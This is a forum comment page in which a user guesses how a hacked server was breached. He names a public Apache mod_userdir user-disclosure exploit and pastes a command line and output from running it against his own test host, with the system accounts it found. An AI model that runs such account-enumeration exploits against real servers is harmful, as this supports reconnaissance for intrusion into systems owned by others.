|
|
|
|
- Readme First! - Read and follow the rules, otherwise your posts will be closed |
|
|
|
|
|
There are currently, 265 guest(s) and 0 member(s) that are online.
You are Anonymous user. You can register for free by clicking here |
|
|
|
|
|
| The comments are owned by the poster. We aren't responsible for their content. |
| | | | |
No Comments Allowed for Anonymous, please register | | | | |
Re: Hacker on the Loose (Score: 1) by VIPixel on Wednesday, December 10 @ 14:22:28 CET (User Info | Send a Message) | like I said, Mikey and I can't do anything but waiting :( server was shutdown by Tech guy to restore
*maybe*
using this basic method:
Apache 1.3.*-2.0.48 mod_userdir remote users disclosure Exploit
m00-apache-w00t.c
and they modified the code to dig more deeper.
this exploit method spread on 12.06.2003
testing the basic code on my localhost
./testing -t www.vipixel.dev -p 80 -u
[*] Apache 1.3.*-2.0.48 remote users disclosure exploit by m00 Security.
[*] Checking http server [(Link: www.vipixel.dev:80]...)www.vipixel.dev:80]...
Apache => yes
Vulnerable => yes
OS => Unix unknow
[*] Searching for system accounts...
root => yes
apache => yes
www => yes
nobody => yes
mysql => yes
ftp => yes
anonymous => yes
shutdown => yes
[*] Searching complete.
8 users checked
8 users found
* This is just proof-of-concept code. More powerful won't be published.
once again that's maybe
|
| Parent | | | | | |
|